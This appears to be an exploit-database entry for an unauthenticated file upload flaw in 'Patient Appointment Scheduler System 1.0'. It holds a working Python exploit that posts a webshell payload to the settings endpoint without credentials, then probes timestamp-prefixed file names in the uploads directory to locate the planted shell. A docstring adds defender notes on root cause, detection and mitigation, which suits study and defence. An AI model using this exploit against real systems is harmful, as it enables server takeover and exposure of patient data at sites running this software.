Exploits / Vulnerability Discovered : 2021-09-06 |
Type : webapps |
Platform : php
This exploit / vulnerability, "Patient Appointment Scheduler System 1.0 - unauthenticated file upload", is for educational purposes only; if you use it, you do so at your own risk!
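def exploit(url:str, file:str, delay:int) -> None:
    """Upload a local file through the settings endpoint and locate its stored name.

    The function POSTs ``file`` as the multipart field ``img`` to
    ``<url>/classes/SystemSettings.php?f=update_settings`` without sending
    any session or credentials, then requests
    ``<url>/uploads/<timestamp>_<basename>`` for every integer timestamp in
    ``[upload time - delay, upload time + delay]``. The first response whose
    status is not 302 is reported as the stored file.

    Args:
        url: Base URL of the application, without a trailing slash.
        file: Path of the local file to upload.
        delay: Half-width, in seconds, of the timestamp window that is probed.

    Returns:
        None. The outcome is reported through ``logging`` only.

    Review notes for defenders (derived from the requests made here):
        * Root cause as exercised: the upload handler accepts a file from an
          unauthenticated client and, judging by the probe URLs, stores it
          under the web-served ``uploads/`` directory with its original name
          and extension (assumed from this script; confirm on the server).
        * Detection: a multipart POST to ``/classes/SystemSettings.php`` with
          ``f=update_settings`` from a client with no authenticated session,
          followed by a run of GETs to ``/uploads/<epoch>_<name>`` that
          differ only in the numeric prefix.
        * Mitigation: require an authenticated, authorised session on the
          settings endpoint, restrict uploads to an allow-list of image
          types, and prevent script execution in the uploads directory (or
          store uploads outside the web root).
    """
    if not os.path.exists(file):
        # The original message carried a stray second closing quote.
        logging.error(f'webshell payload "{file}" does not exist?')
        return

    name = os.path.basename(file)
    logging.info(f'uploading webshell payload "{name}" to {url}/uploads ...')
    uploadTime = int(time.time())
    # The context manager closes the file handle once the request has been
    # sent; the original left the handle open for the life of the process.
    with open(file, 'rb') as payload:
        r = requests.post(url + '/classes/SystemSettings.php',
            files={'img' : (name, payload)}, # NOTE: can also use 'cover' field, but this is more inconspicuous
            params={'f' : 'update_settings'},
            # Certificate validation is switched off for this request only;
            # the GET probes below use the library default.
            verify=False
        )
    if not r.ok:
        logging.error('HTTP upload request failed')
        return

    logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
    for i in range(uploadTime - delay, uploadTime + delay + 1):
        candidate = f'{url}/uploads/{i}_{name}'
        r = requests.get(candidate, allow_redirects=False)
        logging.debug(f'trying {candidate} ...')
        # NOTE: website will send redirects for all files that do not exist
        if r.status_code != 302:
            # NOTE(review): the standard logging module has no success();
            # presumably a custom level is registered elsewhere in this
            # script - confirm before running this block in isolation.
            logging.success(f'webshell payload found on target at {candidate}')
            return

    logging.error('failed to find payload on target')
    logging.warning('maybe need a larger delay or uploads directory is not writable?')
    return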